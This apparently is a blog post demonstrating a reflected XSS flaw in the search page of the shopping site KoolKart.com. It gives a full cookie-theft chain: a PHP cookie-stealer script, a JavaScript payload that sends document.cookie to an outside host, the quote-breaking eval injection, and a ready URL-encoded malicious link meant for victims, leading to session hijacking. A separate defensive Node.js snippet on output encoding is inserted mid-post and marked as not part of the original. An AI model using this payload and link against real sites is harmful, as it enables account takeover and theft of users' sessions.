KoolKart.com, get Kooler by sanitizing your input


Earlier, I demonstrated the XSS vulnerability in DealsAndYou (fixed) and now, I’ll demo an XSS bug on KoolKart.com. I’ll describe the whole process below.

Step 1 – Writing a PHP script that saves the cookie returned by the injected code (cookie-stealer.php).

<?php
// The cookie value arrives in the query string from the injected script.
$str = isset($_REQUEST['cookie']) ? trim($_REQUEST['cookie']) : '';
$file = 'cookie.txt';
if(!empty($str)){
    // Append a timestamped entry to the log file (create it on first use).
    $current = file_exists($file) ? file_get_contents($file) : '';
    $current .= date('Y-m-d H:i:s') . "\t\t" . $str . "\n\n\n";
    file_put_contents($file, $current);
    // Send the browser back to KoolKart so nothing looks out of place.
    header('Location: http://www.koolkart.com/');
    exit;
}

The code is self-explanatory. It gets the cookie information via the query string, saves it to a text file and redirects back to KoolKart.

Step 2 – Writing the JavaScript injection script.

// Read the page's cookies and hand them to the collecting script.
var mycookie=document.cookie;
window.location.href='http://vivekgupta.com/test/cookie-stealer.php?cookie='+escape(mycookie);

The above code reads the cookie and sends it to the remote server, with the cookie information in the query string.

Step 3 – Finding the XSS pattern.

It took me a couple of tries to find the vulnerable JavaScript code on KoolKart. I realized that the search term passed to the following jQuery statement was not being sanitized:

$("#product-search-bar").val("");

So I created a pattern to exploit this bug. The pattern looks like:

");eval("Javascript code here
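As an added example that is not part of the original post, the Node.js snippet below models how the search term is reflected into that jQuery call, shows the same ");eval(" shape closing the string literal, and shows the server-side encoding that keeps the term inert. The function names, the stub jQuery and the stub eval are assumptions for illustration only.

```javascript
// Added example (not from the original post). Models the reflected search term
// in the inline jQuery call and the encoding that keeps it inert. The function
// names, stub jQuery and stub eval below are illustrative assumptions.

// Vulnerable rendering: the raw query parameter is concatenated into a JS
// string literal, so a double quote in the term closes the literal and the
// rest of the term becomes code.
function renderSearchScriptUnsafe(term) {
  return '<script>$("#product-search-bar").val("' + term + '");</script>';
}

// Encode a value for use inside an inline <script>. JSON.stringify yields a
// valid JS string literal (quotes, backslashes and control characters
// escaped); the extra replacements keep the HTML parser from closing the
// script early and cover the two line terminators JSON leaves unescaped.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened rendering: the term can only ever be a string argument to .val().
function renderSearchScriptSafe(term) {
  return '<script>$("#product-search-bar").val(' + jsStringLiteral(term) + ');</script>';
}

// Constructed test input with the shape from the write-up, the eval body
// reduced to a harmless marker.
const SAMPLE_PAYLOAD = '");eval("document.title=1';

// Run the script body with a stub jQuery and a stub eval so we can observe
// what reached .val() and whether anything outside the literal executed.
function runRendered(rendered) {
  const body = rendered.slice('<script>'.length, -'</script>'.length);
  const seen = { val: null, evalCalled: false, error: null };
  const $ = () => ({ val: (v) => { seen.val = v; } });
  const stubEval = () => { seen.evalCalled = true; };
  try {
    // 'eval' as a parameter name shadows the real one (sloppy-mode function).
    new Function('$', 'eval', body)($, stubEval);
  } catch (e) {
    seen.error = e.constructor.name;
  }
  return seen;
}
```

Marking the session cookie HttpOnly would additionally keep document.cookie from exposing it, independently of the output encoding.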

Below is the final JavaScript injection code:

");eval("var mycookie=document.cookie;window.location.href='http://vivekgupta.com/test/cookie-stealer.php?cookie='+escape(mycookie);

URL-encoding this gives us:

%22%29%3Beval%28%22var+mycookie%3Ddocument.cookie%3Bwindow.location.href%3D%27http%3A%2F%2Fvivekgupta.com%2Ftest%2Fcookie-stealer.php%3Fcookie%3D%27%2Bescape%28mycookie%29%3B

Now, search for anything on KoolKart to get the following search URL:

KoolKart Search URL

Replace the search term (“a” in my case) with the URL-encoded injection code. This is the malicious link which can be sent to the victim to steal their cookie.

http://www.koolkart.com/search.htm?text=%22%29%3Beval%28%22var+mycookie%3Ddocument.cookie%3Bwindow.location.href%3D%27http%3A%2F%2Fvivekgupta.com%2Ftest%2Fcookie-stealer.php%3Fcookie%3D%27%2Bescape%28mycookie%29%3B&cat=Everything&m=

Step 4 – Stealing the cookie information and using it to log in without username and password.

The video below describes the whole process:
